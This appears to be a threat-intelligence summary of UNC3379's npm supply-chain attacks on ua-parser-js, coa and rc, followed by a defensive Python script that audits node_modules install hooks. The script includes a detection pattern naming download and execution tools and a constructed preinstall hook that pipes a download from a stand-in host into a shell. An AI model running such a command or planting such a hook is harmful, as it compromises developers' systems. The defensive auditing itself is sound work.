Full Report
Mandiant has attributed the supply chain attacks that compromised ua-parser-js, coa, and rc to UNC3379. The malicious package versions downloaded and executed a Monero cryptocurrency miner and the DANABOT banking trojan, with the payloads delivered depending on the victim's operating system.
Analysis Summary
# Threat Actor: UNC3379
## Attribution & Identity
* **Identified/Attributed Threat Actor:** UNC3379
* **Known Aliases/Associated Groups:** None explicitly mentioned in the context; the attribution is Mandiant's.
## Activity Summary
Mandiant attributed a recent series of supply chain attacks targeting the Node.js/npm ecosystem to UNC3379. This campaign involved compromising legitimate, widely used packages such as `ua-parser-js`, `coa`, and `rc`. The impact observed was resource hijacking following the successful supply chain compromise.
## Tactics, Techniques & Procedures
* **Observed Techniques:**
  * Supply Chain Compromise (specifically targeting widely used public repositories/packages).
## Targeting
* **Sectors:** Not explicitly detailed, but targeting infrastructure supporting software development (npm ecosystem).
* **Geography:** Not specified in the provided context.
* **Victims:** Packages compromised include `ua-parser-js`, `coa`, and `rc`.
## Tools & Infrastructure
* **Malware Families Used:**
  * Monero Cryptocurrency Miner
  * DANABOT banking trojan
* **Infrastructure:** Not specified in the provided context.
## Implications
UNC3379 is leveraging the software supply chain, a high-impact vector, to deploy dual-purpose malicious payloads—financial theft (banking trojan) and illicit monetization (cryptocurrency mining)—based on the victim's operating system.
## Mitigations
* Scrutinize dependencies pulled from public repositories, especially high-use, community-maintained packages.
* Implement strict software composition analysis (SCA) to detect suspicious changes or behavior in third-party libraries.
* Monitor endpoint activity for signs of cryptocurrency mining or new banking malware execution originating from legitimate application processes.
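As an added example (not code from the Mandiant report or from the affected projects), the following Python script puts the first two mitigations into practice: it walks a node_modules tree, flags the package names listed on this page, and flags install lifecycle hooks, especially ones that fetch or execute remote content. It assumes the malicious code is delivered through an npm install hook, which the page does not state, and the sample manifests are constructed.

```python
import json
import os
import re

# Names compromised in the campaign. Affected version ranges are not given on
# the page, so only the name is matched; verify installed versions manually.
WATCHLIST = {"ua-parser-js", "coa", "rc"}
# Hooks npm runs automatically during `npm install` (assumed delivery point).
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Utilities an install script would use to fetch or run remote content.
FETCH_OR_EXEC = re.compile(r"\b(curl|wget|certutil|bitsadmin|powershell|node\s+-e)\b", re.I)


def audit_manifest(manifest):
    """Return findings for one parsed package.json; an empty list means clean."""
    findings = []
    name = manifest.get("name", "<unnamed>")
    if name in WATCHLIST:
        findings.append(f"{name}: on compromised-package watchlist, check version")
    for hook in INSTALL_HOOKS:
        cmd = (manifest.get("scripts") or {}).get(hook)
        if cmd is None:
            continue
        findings.append(f"{name}: defines {hook} hook: {cmd!r}")
        if FETCH_OR_EXEC.search(cmd):
            findings.append(f"{name}: {hook} hook fetches or executes remote content")
    return findings


def audit_node_modules(root):
    """Walk a node_modules tree and audit every package.json found."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                findings.extend(audit_manifest(json.load(fh)))
            except json.JSONDecodeError:
                findings.append(f"{dirpath}: unparseable package.json")
    return findings


# Constructed samples (not real package data): a benign build script, and a
# watchlisted name whose preinstall hook pipes a download into a shell.
SAMPLE_BENIGN = {"name": "tiny-util", "scripts": {"build": "tsc -p ."}}
SAMPLE_SUSPICIOUS = {"name": "ua-parser-js", "version": "0.0.0-constructed",
                     "scripts": {"preinstall": "curl -s https://example.invalid/p | sh"}}

if __name__ == "__main__":
    print("\n".join(audit_manifest(SAMPLE_BENIGN) + audit_manifest(SAMPLE_SUSPICIOUS)))
```

Pass a node_modules path to audit_node_modules() to run it against a real install; installing with npm's --ignore-scripts flag prevents such hooks from running at all.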